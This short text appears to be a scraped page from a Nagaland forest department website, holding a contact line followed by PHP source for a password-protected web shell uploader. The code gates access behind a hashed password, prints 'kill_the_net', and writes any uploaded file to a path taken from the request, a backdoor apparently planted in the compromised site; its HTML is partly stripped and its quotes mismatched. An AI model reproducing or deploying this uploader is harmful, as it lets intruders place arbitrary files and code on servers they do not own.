Phone- +91-370-2244227 | +91-370-2241731 | Email- info[at]nagalandforest[dot]in

ok<?php
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7221a4946b2ccf5d1f2161c2c1c474bbe1bd7e0382bb1d1f7de59453986f4752') {
$_SESSION['secretyt'] = true; } else { die(' body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } ‘); } } }
?>
<?php
echo('kill_the_net');
$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "

OK-Click here!

“;
}
}echo ‘Upload files…‘;
?>